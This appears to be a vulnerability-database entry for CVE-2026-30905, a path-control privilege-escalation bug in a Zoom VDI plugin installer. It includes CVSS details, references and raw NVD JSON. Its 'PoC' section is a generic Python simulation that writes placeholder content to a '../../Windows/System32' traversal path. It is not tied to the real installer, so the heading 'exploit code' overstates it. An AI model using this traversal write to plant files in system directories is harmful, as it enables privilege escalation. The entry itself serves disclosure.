CVE-2026-30905

Description

External Control of File Name or Path in the Zoom Workplace VDI Plugin Windows Universal Installer before version 6.6.11 may allow an authenticated user to conduct an escalation of privilege via local access.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Zoom Workplace VDI Plugin Windows Universal Installer < 6.6.11

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC Concept for External Control of File Name or Path
# This script demonstrates how an unvalidated path could lead to privilege escalation.
# Note: This is a simulation for educational purposes.

import os

def vulnerable_installer_component(user_input_path):
    # Simulating a vulnerable function that does not validate the path
    # In the real scenario, this might be part of an installer running with high privileges
    try:
        # The vulnerability allows writing to arbitrary paths controlled by the user
        full_path = os.path.abspath(user_input_path)
        
        print(f"[*] Attempting to write to: {full_path}")
        
        with open(full_path, 'w') as f:
            # Writing malicious content (e.g., a DLL or configuration)
            f.write("MALICIOUS_PAYLOAD_CONTENT")
            
        print(f"[+] Success! File written to {full_path}")
        print("[+] Privilege escalation potential achieved if path was in a protected system directory.")
        
    except Exception as e:
        print(f"[-] Error: {e}")

# Attack Scenario: Attacker provides a path to a system directory
# Using relative path traversal to escape the intended installation directory
malicious_input = "../../Windows/System32/evil_hijack.dll"

vulnerable_installer_component(malicious_input)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-30905
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-30905
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-30905/
[4] VulDB https://vuldb.com/cve/CVE-2026-30905
[5] https://www.zoom.com/en/trust/security-bulletin/zsb-26007

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-30905", "sourceIdentifier": "[email protected]", "published": "2026-05-13T19:17:05.367", "lastModified": "2026-05-14T18:15:05.433", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "External Control of File Name or Path in the Zoom Workplace VDI Plugin Windows Universal Installer before version 6.6.11 may allow an authenticated user to conduct an escalation of privilege via local access."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-73"}]}], "references": [{"url": "https://www.zoom.com/en/trust/security-bulletin/zsb-26007", "source": "[email protected]"}]}}